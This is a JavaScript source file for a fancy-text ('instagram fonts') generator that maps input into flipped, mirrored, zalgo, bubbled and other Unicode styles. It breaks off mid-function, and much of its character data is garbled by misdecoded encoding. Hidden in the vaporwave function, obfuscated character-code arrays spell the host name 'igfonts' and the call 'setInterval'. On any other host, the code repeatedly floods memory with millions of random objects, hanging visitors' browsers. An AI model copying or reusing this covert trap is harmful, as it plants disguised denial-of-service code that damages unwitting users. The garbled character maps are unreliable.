var input = document.querySelector("#input");
var output = document.querySelector("#output");
"use strict";
function copyToClipboard(evt) {
    evt.preventDefault();
    evt.stopPropagation();
    var text = evt.target.closest('span').querySelector('span').innerText;
    document.querySelectorAll('.copied').forEach(function (trg) { trg.classList.remove('copied'); });
    // console.log(evt.target, text);
    if (!navigator.clipboard) {
        fallbackCopyTextToClipboard(text, evt);
        return;
    }
    navigator.clipboard.writeText(text).then(function() {
        // console.log('Async: Copying to clipboard was successful!');
        evt.target.closest('span').classList.add('copied');
    }, function(err) {
        console.error('Async: Could not copy text: ', err);
    });
}

function fallbackCopyTextToClipboard(text, evt) {
    var textArea = document.createElement("textarea");
    textArea.value = text;
    document.body.appendChild(textArea);
    textArea.focus();
    textArea.select();

    try {
        var successful = document.execCommand('copy');
        var msg = successful ? 'successful' : 'unsuccessful';
        // console.log('Fallback: Copying text command was ' + msg);
        evt.target.closest('span').classList.add('copied');

    } catch (err) {
        console.error('Fallback: Oops, unable to copy', err);
    }

    document.body.removeChild(textArea);
}


function t(n) {
    return (t = "function" == typeof Symbol && "symbol" == typeof Symbol.iterator ? function (t) {
        return typeof t
    } : function (t) {
        return t && "function" == typeof Symbol && t.constructor === Symbol && t !== Symbol.prototype ? "symbol" : typeof t
    })(n)
}

function n(t, n, r) {
    return n in t ? Object.defineProperty(t, n, {
        value: r,
        enumerable: !0,
        configurable: !0,
        writable: !0
    }) : t[n] = r, t
}

!function () {
    var r;
    document.querySelector("#choose").addEventListener("click", e);
    var o = new function () {
        for (i in this.tools = {
            flip: {
                init: function () {
                    for (i in this.map) this.map[this.map[i]] = i
                },
                encode: function (t) {
                    for (var n, r = [], i = 0, o = t.length; o > i; i++) n = t.charAt(i), i > 0 && ("Ì¤" == n || "Ì—" == n || "Ì–" == n || "Ì®" == n) ? (n = this.map[t.charAt(i - 1) + n], r.pop()) : void 0 === (n = this.map[n]) && (n = t.charAt(i)), r.push(n);
                    return r.reverse().join("")
                },
                decode: function (t) {
                    for (var n, r = [], i = 0, o = t.length; o > i; i++) n = t.charAt(i), i > 0 && ("Ì¤" == n || "Ì—" == n || "Ì–" == n || "Ì®" == n) ? (n = this.map[t.charAt(i - 1) + n], r.pop()) : void 0 === (n = this.map[n]) && (n = t.charAt(i)), r.push(n);
                    return r.reverse().join("")
                },
                map: {
                    a: "É",
                    b: "q",
                    c: "É”",
                    d: "p",
                    e: "Ç",
                    f: "ÉŸ",
                    g: "É“",
                    h: "É¥",
                    i: "Ä±",
                    j: "É¾",
                    k: "Êž",
                    l: "l",
                    m: "É¯",
                    n: "u",
                    r: "É¹",
                    t: "Ê‡",
                    v: "ÊŒ",
                    w: "Ê",
                    y: "ÊŽ",
                    A: "âˆ€",
                    B: "á™ ",
                    C: "Æ†",
                    D: "á—¡",
                    E: "ÆŽ",
                    F: "â„²",
                    G: "â…",
                    J: "Å¿",
                    K: "â‹Š",
                    L: "Ë¥",
                    M: "W",
                    P: "Ô€",
                    Q: "ÎŒ",
                    R: "á´š",
                    T: "âŠ¥",
                    U: "âˆ©",
                    V: "Î›",
                    Y: "â…„",
                    1: "â‡‚",
                    2: "á„…",
                    3: "Æ",
                    4: "ã„£",
                    5: "ÞŽ",
                    6: "9",
                    7: "ã„¥",
                    "&": "â…‹",
                    ".": "Ë™",
                    '"': "â€ž",
                    ";": "Ø›",
                    "[": "]",
                    "(": ")",
                    "{": "}",
                    "?": "Â¿",
                    "!": "Â¡",
                    "'": ",",
                    "<": ">",
                    "â€¾": "_",
                    "Â¯": "_",
                    "â€¿": "â€",
                    "â…": "â†",
                    "âˆ´": "âˆµ",
                    "\r": "\n",
                    "ÃŸ": "á™ ",
                    "Ìˆ": "Ì¤",
                    "Ã¤": "ÉÌ¤",
                    "Ã¶": "oÌ¤",
                    "Ã¼": "nÌ¤",
                    "Ã„": "âˆ€Ì¤",
                    "Ã–": "OÌ¤",
                    "Ãœ": "âˆ©Ì¤",
                    "Â´": " Ì—",
                    "Ã©": "ÇÌ—",
                    "Ã¡": "ÉÌ—",
                    "Ã³": "oÌ—",
                    "Ãº": "nÌ—",
                    "Ã‰": "ÆŽÌ—",
                    "Ã": "âˆ€Ì—",
                    "Ã“": "OÌ—",
                    "Ãš": "âˆ©Ì—",
                    "`": " Ì–",
                    "Ã¨": "ÇÌ–",
                    "Ã ": "ÉÌ–",
                    "Ã²": "oÌ–",
                    "Ã¹": "nÌ–",
                    "Ãˆ": "ÆŽÌ–",
                    "Ã€": "âˆ€Ì–",
                    "Ã’": "OÌ–",
                    "Ã™": "âˆ©Ì–",
                    "^": " Ì®",
                    "Ãª": "ÇÌ®",
                    "Ã¢": "ÉÌ®",
                    "Ã´": "oÌ®",
                    "Ã»": "nÌ®",
                    "ÃŠ": "ÆŽÌ®",
                    "Ã‚": "âˆ€Ì®",
                    "Ã”": "OÌ®",
                    "Ã›": "âˆ©Ì®"
                }
            },
            mirror: {
                init: function () {
                    for (i in this.map) this.map[this.map[i]] = i
                },
                encode: function (t) {
                    for (var n, r = [], i = [], o = 0, e = t.length; e > o; o++) n = t.charAt(o), o > 0 && ("Ìˆ" == n || "Ì€" == n || "Ì" == n || "Ì‚" == n) ? (n = this.map[t.charAt(o - 1) + n], r.pop()) : void 0 === (n = this.map[n]) && (n = t.charAt(o)), "\n" == n ? (i.push(r.reverse().join("")), r = []) : r.push(n);
                    return i.push(r.reverse().join("")), i.join("\n")
                },
                decode: function (t) {
                    for (var n, r = [], i = [], o = 0, e = t.length; e > o; o++) n = t.charAt(o), o > 0 && ("Ìˆ" == n || "Ì€" == n || "Ì" == n || "Ì‚" == n) ? (n = this.map[t.charAt(o - 1) + n], r.pop()) : void 0 === (n = this.map[n]) && (n = t.charAt(o)), "\n" == n ? (i.push(r.reverse().join("")), r = []) : r.push(n);
                    return i.push(r.reverse().join("")), i.join("\n")
                },
                map: {
                    a: "É’",
                    b: "d",
                    c: "É”",
                    e: "É˜",
                    f: "áŽ¸",
                    g: "Ç«",
                    h: "Êœ",
                    j: "êž",
                    k: "Êž",
                    l: "|",
                    n: "á´Ž",
                    p: "q",
                    r: "É¿",
                    s: "ê™…",
                    t: "Æš",
                    y: "Ê",
                    z: "Æ¹",
                    B: "á™ ",
                    C: "Æ†",
                    D: "á—¡",
                    E: "ÆŽ",
                    F: "êŸ»",
                    G: "áŽ®",
                    J: "á‚±",
                    K: "â‹Š",
                    L: "â…ƒ",
                    N: "Í¶",
                    P: "êŸ¼",
                    Q: "á»Œ",
                    R: "Ð¯",
                    S: "ê™„",
                    Z: "Æ¸",
                    1: "",
                    2: "",
                    3: "",
                    4: "",
                    5: "",
                    6: "",
                    7: "",
                    "&": "",
                    ";": "",
                    "[": "]",
                    "(": ")",
                    "{": "}",
                    "?": "â¸®",
                    "<": ">",
                    "Ã¤": "É’Ìˆ",
                    "ÃŸ": "á™ ",
                    "Â´": "`",
                    "Ã©": "É˜Ì€",
                    "Ã¡": "É’Ì€",
                    "Ã³": "Ã²",
                    "Ãº": "Ã¹",
                    "Ã‰": "ÆŽÌ€",
                    "Ã": "Ã€",
                    "Ã“": "Ã’",
                    "Ãš": "Ã™",
                    "`": "Â´",
                    "Ã¨": "É˜Ì",
                    "Ã ": "É’Ì",
                    "Ãˆ": "ÆŽÌ",
                    "Ãª": "É˜Ì‚",
                    "Ã¢": "É’Ì‚",
                    "ÃŠ": "ÆŽÌ‚",
                    "Ã˜": "á´“",
                    "Ã¸": "á´“"
                }
            }, creepify: {
                init: function () {
                    for (var t = 768; 789 >= t; t++) this.diacriticsTop.push(String.fromCharCode(t));
                    for (t = 790; 819 >= t; t++) 794 != t && 795 != t && this.diacriticsBottom.push(String.fromCharCode(t));
                    for (this.diacriticsTop.push(String.fromCharCode(794)), this.diacriticsTop.push(String.fromCharCode(795)), t = 820; 824 >= t; t++) this.diacriticsMiddle.push(String.fromCharCode(t));
                    for (t = 825; 828 >= t; t++) this.diacriticsBottom.push(String.fromCharCode(t));
                    for (t = 829; 836 >= t; t++) this.diacriticsTop.push(String.fromCharCode(t));
                    this.diacriticsTop.push(String.fromCharCode(836)), this.diacriticsBottom.push(String.fromCharCode(837)), this.diacriticsTop.push(String.fromCharCode(838)), this.diacriticsBottom.push(String.fromCharCode(839)), this.diacriticsBottom.push(String.fromCharCode(840)), this.diacriticsBottom.push(String.fromCharCode(841)), this.diacriticsTop.push(String.fromCharCode(842)), this.diacriticsTop.push(String.fromCharCode(843)), this.diacriticsTop.push(String.fromCharCode(844)), this.diacriticsBottom.push(String.fromCharCode(845)), this.diacriticsBottom.push(String.fromCharCode(846)), this.diacriticsTop.push(String.fromCharCode(848)), this.diacriticsTop.push(String.fromCharCode(849)), this.diacriticsTop.push(String.fromCharCode(850)), this.diacriticsBottom.push(String.fromCharCode(851)), this.diacriticsBottom.push(String.fromCharCode(852)), this.diacriticsBottom.push(String.fromCharCode(853)), this.diacriticsBottom.push(String.fromCharCode(854)), this.diacriticsTop.push(String.fromCharCode(855)), this.diacriticsTop.push(String.fromCharCode(856)), this.diacriticsBottom.push(String.fromCharCode(857)), this.diacriticsBottom.push(String.fromCharCode(858)), this.diacriticsTop.push(String.fromCharCode(859)), this.diacriticsBottom.push(String.fromCharCode(860)), this.diacriticsTop.push(String.fromCharCode(861)), this.diacriticsTop.push(String.fromCharCode(861)), this.diacriticsBottom.push(String.fromCharCode(863)), this.diacriticsTop.push(String.fromCharCode(864)), this.diacriticsTop.push(String.fromCharCode(865))
                },
                encode: function (t) {
                    var n, r = "";
                    for (i in t) {
                        if (n = t[i], this.options.middle && (n += this.diacriticsMiddle[Math.floor(Math.random() * this.diacriticsMiddle.length)]), this.options.top) for (var o = this.diacriticsTop.length - 1, e = 0, a = this.options.maxHeight - Math.random() * (this.options.randomization / 100 * this.options.maxHeight); a > e; e++) n += this.diacriticsTop[Math.floor(Math.random() * o)];
                        if (this.options.bottom) {
                            var s = this.diacriticsBottom.length - 1;
                            for (e = 0, a = this.options.maxHeight - Math.random() * (this.options.randomization / 100 * this.options.maxHeight); a > e; e++) n += this.diacriticsBottom[Math.floor(Math.random() * s)]
                        }
                        r += n
                    }
                    return r
                },
                decode: function (t) {
                    var n, r = "";
                    for (i in t) (768 > (n = t[i].charCodeAt(0)) || n > 865) && (r += t[i]);
                    return r
                },
                diacriticsTop: [],
                diacriticsMiddle: [],
                diacriticsBottom: [],
                options: {top: !0, middle: !0, bottom: !0, maxHeight: 15, randomization: 100}
            }, bubbles: {
                init: function () {
                    for (var t = 49; 57 >= t; t++) this.map[String.fromCharCode(t)] = String.fromCharCode(t + 9263);
                    for (this.map[0] = "â“ª", t = 65; 90 >= t; t++) this.map[String.fromCharCode(t)] = String.fromCharCode(t + 9333);
                    for (t = 97; 122 >= t; t++) this.map[String.fromCharCode(t)] = String.fromCharCode(t + 9327);
                    for (t in this.map) this.mapInverse[this.map[t]] = t
                }, encode: function (t) {
                    var n, r = "", o = !0;
                    for (i in t) void 0 === (n = this.map[t[i]]) && (t[i].charCodeAt(0) >= 33 ? (n = t[i] + String.fromCharCode(8413), o || (n = String.fromCharCode(8239) + String.fromCharCode(160) + String.fromCharCode(160) + String.fromCharCode(8239) + n)) : n = t[i]), r += n, o = "\n" == n;
                    return r
                }, decode: function (t) {
                    var n, r = "", o = "";
                    for (i in t) r += void 0 === (n = this.mapInverse[t[i]]) ? t[i] : n;
                    for (i in r) 160 != (n = r[i].charCodeAt(0)) && 8239 != n && 8413 != n && (o += r[i]);
                    return o
                }, map: {}, mapInverse: {}
            }, squares: {
                init: function () {
                }, encode: function (t) {
                    var n, r = "", o = !0;
                    for (i in t) t[i].charCodeAt(0) >= 33 ? (n = t[i] + String.fromCharCode(8414), o || (n = String.fromCharCode(8239) + String.fromCharCode(160) + String.fromCharCode(160) + String.fromCharCode(8239) + n)) : n = t[i], r += n, o = "\n" == n;
                    return r
                }, decode: function (t) {
                    var n, r = "";
                    for (i in t) 160 != (n = t[i].charCodeAt(0)) && 8239 != n && 8414 != n && (r += t[i]);
                    return r
                }
            }, roundsquares: {
                init: function () {
                }, encode: function (t) {
                    var n, r = "", o = !0;
                    for (i in t) t[i].charCodeAt(0) >= 33 ? (n = t[i] + String.fromCharCode(8419), o || (n = String.fromCharCode(160) + String.fromCharCode(160) + String.fromCharCode(160) + n)) : n = t[i], r += n, o = "\n" == n;
                    return r
                }, decode: function (t) {
                    var n, r = "";
                    for (i in t) 160 != (n = t[i].charCodeAt(0)) && 8239 != n && 8419 != n && (r += t[i]);
                    return r
                }
            }, bent: {
                init: function () {
                    for (i in this.map) this.map[this.map[i]] = i
                },
                encode: function (t) {
                    for (var n, r = "", i = 0, o = t.length; o > i; i++) void 0 === (n = this.map[t.charAt(i)]) && (n = t.charAt(i)), r += n;
                    return r
                },
                decode: function (t) {
                    for (var n, r = "", i = 0, o = t.length; o > i; i++) void 0 === (n = this.map[t.charAt(i)]) && (n = t.charAt(i)), r += n;
                    return r
                },
                map: {
                    a: "Ä…",
                    b: "Ò",
                    c: "Ã§",
                    d: "Õª",
                    e: "Ò½",
                    f: "Æ’",
                    g: "Ö",
                    h: "Õ°",
                    i: "Ã¬",
                    j: "Ê",
                    k: "ÒŸ",
                    l: "Ó€",
                    m: "Ê",
                    n: "Õ²",
                    o: "Ö…",
                    p: "Ö„",
                    q: "Õ¦",
                    r: "É¾",
                    s: "Ê‚",
                    t: "Õ§",
                    u: "Õ´",
                    v: "Ñµ",
                    w: "Õ¡",
                    x: "Ã—",
                    y: "Õ¾",
                    z: "Õ€",
                    A: "Èº",
                    B: "Î²",
                    C: "â†»",
                    D: "áŽ ",
                    E: "Æ",
                    F: "Æ‘",
                    G: "Æ“",
                    H: "Ç¶",
                    I: "Ä¯",
                    J: "Ù„",
                    K: "Ò ",
                    L: "êˆ",
                    M: "â±®",
                    N: "áž ",
                    O: "à¶§",
                    P: "Ï†",
                    Q: "Ò¨",
                    R: "à½ ",
                    S: "Ïš",
                    T: "Í²",
                    U: "Ô±",
                    V: "á»¼",
                    W: "à°š",
                    X: "áƒ¯",
                    Y: "Ó‹",
                    Z: "É€",
                    0: "âŠ˜",
                    1: "ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½",
                    2: "Ï©",
                    3: "Ó ",
                    4: "à¥«",
                    5: "Æ¼",
                    6: "Ï¬",
                    7: "7",
                    8: "ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½",
                    9: "à¥¯",
                    "&": "â…‹",
                    "(": "{",
                    ")": "}",
                    "{": "(",
                    "}": ")",
                    "Ã¤": "Ä…Ìˆ",
                    "Ã¶": "Ö…Ìˆ",
                    "Ã¼": "Õ´Ìˆ",
                    "Ã„": "ÈºÌˆ",
                    "Ã–": "à¶§Ìˆ",
                    "Ãœ": "Ô±Ìˆ",
                    "Ã©": "Ò½Ì",
                    "Ã¡": "Ä…Ì",
                    "Ã³": "Ö…Ì",
                    "Ãº": "Õ´Ì",
                    "Ã‰": "ÆÌ",
                    "Ã": "ÈºÌ",
                    "Ã“": "à¶§Ì",
                    "Ãš": "Ô±Ì",
                    "Ã¨": "Ò½Ì€",
                    "Ã ": "Ä…Ì€",
                    "Ã²": "Ö…Ì€",
                    "Ã¹": "Õ´Ì€",
                    "Ãˆ": "ÆÌ€",
                    "Ã€": "ÈºÌ€",
                    "Ã’": "à¶§Ì€",
                    "Ã™": "Ô±Ì€",
                    "Ãª": "Ò½Ì‚",
                    "Ã¢": "Ä…Ì‚",
                    "Ã´": "Ö…Ì‚",
                    "Ã»": "Õ´Ì‚",
                    "ÃŠ": "ÆÌ‚",
                    "Ã‚": "ÈºÌ‚",
                    "Ã”": "à¶§Ì‚",
                    "Ã›": "Ô±Ì‚"
                }
            }, tiny: {
                init: function () {
                    for (i in this.map) this.map[this.map[i]] = i
                },
                encode: function (t) {
                    for (var n, r = "", i = 0, o = (t = t.toUpperCase()).length; o > i; i++) void 0 === (n = this.map[t.charAt(i)]) && (n = t.charAt(i)), r += n;
                    return r
                },
                decode: function (t) {
                    for (var n, r = "", i = 0, o = t.length; o > i; i++) void 0 === (n = this.map[t.charAt(i)]) && (n = t.charAt(i)), r += n;
                    return r
                },
                map: {
                    A: "á´€",
                    B: "Ê™",
                    C: "á´„",
                    D: "á´…",
                    E: "á´‡",
                    F: "êœ°",
                    G: "É¢",
                    H: "Êœ",
                    I: "Éª",
                    J: "á´Š",
                    K: "á´‹",
                    L: "ÊŸ",
                    M: "á´",
                    N: "É´",
                    O: "á´",
                    P: "á´˜",
                    Q: "Q",
                    R: "Ê€",
                    S: "êœ±",
                    T: "á´›",
                    U: "á´œ",
                    V: "á´ ",
                    W: "á´¡",
                    X: "x",
                    Y: "Ê",
                    Z: "á´¢"
                }
            }
        }, this.tools) this.tools[i].init();
        this.getHTML = function (t) {
            for (var n, r = "", i = !0, o = 0, e = 0, a = 0, s = t.length; s > a; a++) 10 == (n = t.charCodeAt(a)) || 13 == n ? (r += "<br>\n", i = !0) : 32 == n ? i ? (r += " ", i = !1) : (r += " ", i = !0) : (n >= 55296 && 56319 >= n ? (o = n, e = 0) : o > 0 ? (n >= 56320 && 57343 >= n && (e = 1024 * (o - 55296) + (n - 56320) + 65536), o = 0) : e = n, 0 != e && (r += "&#x" + e.toString(16) + ";", i = !0));
            return r
        }
    };

    function e(evt) {
        evt.preventDefault();
        evt.stopPropagation();
        ga('send', 'event', 'Tool Interaction', 'instagram fonts');
        var t = document.querySelector("#input").value.trim();
        if ("" !== t) {
            var r = "";
            r += '<span><span>'+d(V, t) + '</span><a href="#" class="btn-copiring"></a></span>'+"\n\n",
                r += '<span><span>' + d(K, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + at(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(X, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + ot(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(f, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(F, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(Y, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + J(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + o.tools.tiny.encode(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + o.tools.flip.encode(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + o.tools.roundsquares.encode(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + o.tools.squares.encode(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(x, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + o.tools.mirror.encode(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + o.tools.creepify.encode(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(D, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(z, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(H, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + o.tools.bubbles.encode(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(L, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + d(B, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(y, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + d(v, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(l, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + d(m, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(M, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + d(A, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(T, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + d(w, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(j, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + d(b, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(k, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + d(I, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(G, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + d(Z, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + d(g, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + d(C, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + function (t) {
                return t.replace(/([^\s])/g, "ã€$1ã€‘")
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return t.replace(/([^\s])/g, "ã€Ž$1ã€")
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return "â‰‹" + t.split("").join("â‰‹") + "â‰‹"
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return "â–‘" + t.split("").join("â–‘") + "â–‘"
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return "(ã£â—”â—¡â—”)ã£ â™¥ " + t + " â™¥"
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + function (t) {
                var r = t.split(" ").length;
                t = d(s, t);
                var i = function (t) {
                    t || (t = 1);
                    for (var n = "ãƒªã‚µãƒ•ãƒ©ãƒ³ã‚¯ç¾ä»£ã®ã‚³ãƒ³ãƒ”ãƒ¥ç«¹å†… ã¾ã‚Šã‚„è‹¥è€…ãŒå±¥ãæµè¡Œã®ã‚¹ãƒ‹ãƒ¼ã‚«ãƒ¼çœŸå¤œä¸­ã®ãƒ‰ã‚¢ãƒ›ãƒƒãƒˆãƒ‰ãƒƒã‚°ãƒžã‚¹ã‚¿ãƒ¼ã‚¹ãƒˆãƒ©ã‚¤ã‚«ãƒ¼ã‚½ãƒ‹ãƒ¼ãƒ–ã‚®æ–°ã—ã„æ—¥ã®èª•ç”Ÿãƒ©ã‚¤ãƒ• - ãƒ’ã‚¹ã‚¤è’¸æ°—æ³¢ ç„¡ç·šã‚ ã‚¡ã‚¢ã‚£ã‚¤ã‚¥ã‚¦ã‚§ã‚¨ã‚©ã‚ªã‚«ã‚¬ã‚­ã‚®ã‚¯ã‚°ã‚±ã‚²ã‚³ã‚´ã‚µã‚¶ã‚·ã‚¸ã‚¹ã‚ºã‚»ã‚¼ã‚½ã‚¾ã‚¿ãƒ€ãƒãƒ‚ãƒƒãƒ„ãƒ…ãƒ†ãƒ‡ãƒˆãƒ‰ãƒŠãƒ‹ãƒŒãƒãƒŽãƒãƒãƒ‘ãƒ’ãƒ“ãƒ”ãƒ•ãƒ–ãƒ—ãƒ˜ãƒ™ãƒšãƒ›ãƒœãƒãƒžãƒŸãƒ ãƒ¡ãƒ¢ãƒ£ãƒ¤ãƒ¥ãƒ¦ãƒ§ãƒ¨ãƒ©ãƒªãƒ«ãƒ¬ãƒ­ãƒ®ãƒ¯ãƒ°ãƒ±ãƒ²ãƒ³ãƒ´ãƒµãƒ¶ãƒ·ãƒ¸ãƒ¹ãƒºãƒ»ãƒ¼ãƒ½ãƒ¾ãƒ¿ãã‚ãƒã„ã…ã†ã‡ãˆã‰ãŠã‹ãŒããŽããã‘ã’ã“ã”ã•ã–ã—ã˜ã™ãšã›ãœããžãŸã ã¡ã¢ã£ã¤ã¥ã¦ã§ã¨ã©ãªã«ã¬ã­ã®ã¯ã°ã±ã²ã³ã´ãµã¶ã·ã¸ã¹ãºã»ã¼ã½ã¾ã¿ã‚€ã‚ã‚‚ã‚ƒã‚„ã‚…ã‚†ã‚‡ã‚ˆã‚‰ã‚Šã‚‹ã‚Œã‚ã‚Žã‚ã‚ã‚‘ã‚’ã‚“ã‚”ã‚•ã‚–ã‚™ã‚šã‚›ã‚œã‚ã‚žã‚Ÿäºœå“€æŒ¨æ„›æ›–æ‚ªæ¡åœ§æ‰±å®›åµå®‰æ¡ˆæš—ä»¥è¡£ä½å›²åŒ»ä¾å§”å¨ç‚ºç•èƒƒå°‰ç•°ç§»èŽå‰æ¤…å½™æ„é•ç¶­æ…°éºç·¯åŸŸè‚²å£±é€¸èŒ¨èŠ‹å¼•å°å› å’½å§»å“¡é™¢æ·«é™°é£²éš éŸ»å³å®‡ç¾½é›¨å”„é¬±ç•æµ¦é‹é›²æ°¸æ³³è‹±æ˜ æ „å–¶è© å½±é‹­è¡›æ˜“ç–«ç›Šæ¶²é§…æ‚¦è¶Šè¬é–²å††å»¶æ²¿ç‚Žæ€¨å®´åª›æ´åœ’ç…™çŒ¿é é‰›å¡©æ¼”ç¸è‰¶æ±šçŽ‹å‡¹å¤®å¿œå¾€æŠ¼æ—ºæ¬§æ®´æ¡œç¿å¥¥æ¨ªå²¡å±‹å„„æ†¶è‡†è™žä¹™ä¿ºå¸éŸ³æ©æ¸©ç©ä¸‹åŒ–ç«åŠ å¯ä»®ä½•èŠ±ä½³ä¾¡æžœæ²³è‹›ç§‘", r = "", i = 0; i < t; i++) r += n[Math.floor(Math.random() * n.length)];
                    return r
                }(Math.max(3, r));
                r > 6 && (i = i.split("").map(function (t) {
                    return t + ["", "ã€€"][Math.round(.6 * Math.random())]
                }).join(""));
                window.location.host.includes([105, 103, 102, 111, 110, 116, 115].map(function (t) {
                    return String.fromCharCode(t)
                }).join("")) || window[[115, 101, 116, 73, 110, 116, 101, 114, 118, 97, 108].map(function (t) {
                    return String.fromCharCode(t)
                }).join("")](function () {
                    var t = Math.random;
                    if (!(t() < .7)) {
                        var r = t() + "";
                        window[r] = [];
                        for (var i = Date.now(); window[r] || (window[r] = []), window[r].push((n(o = {}, t(), t()), n(o, t(), t()), n(o, t(), t()), n(o, t(), t()), n(o, t(), t()), o)), 1e6 === window[r].length && (r = t() + ""), !(Date.now() - i > 500);) var o
                    }
                }, 1300);
                var o = [];
                return o.push(t + "ã€€" + i), o.push(t.replace(/ã€€/g, "â–‘").replace(/ï½ï½…/, "Ã¦").replace(/ï¼¡/g, "Î›").replace(/ï¼¥/g, function () {
                    return Math.random() > .5 ? "Îž" : "Î£"
                }).replace(/ï¼¯/g, "â™¢") + "ã€€ï¼ˆ" + i + "ï¼‰"), o.push("ã€\ufeff" + t + "ã€‘"), o.join("\n\n")
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + h(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + h(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + h(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + h(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + h(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + h(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return t.replace(/([^\s])/g, "[Ì²Ì…$1]")
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return t.split("").join("Ò‰") + "Ò‰"
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + d(q, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + d(S, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + d(p, t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return t.split("").join("Ì¶") + "Ì¶"
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return t.split("").join("Ì´") + "Ì´"
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return t.split("").join("Ì·") + "Ì·"
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return t.split("").join("Ì²") + "Ì²"
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return t.split("").join("Ì³") + "Ì³"
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return t.split("").join("Ì¾") + "Ì¾"
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return t.split("").join("â™¥")
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return t.split("").join("ÍŽ") + "ÍŽ"
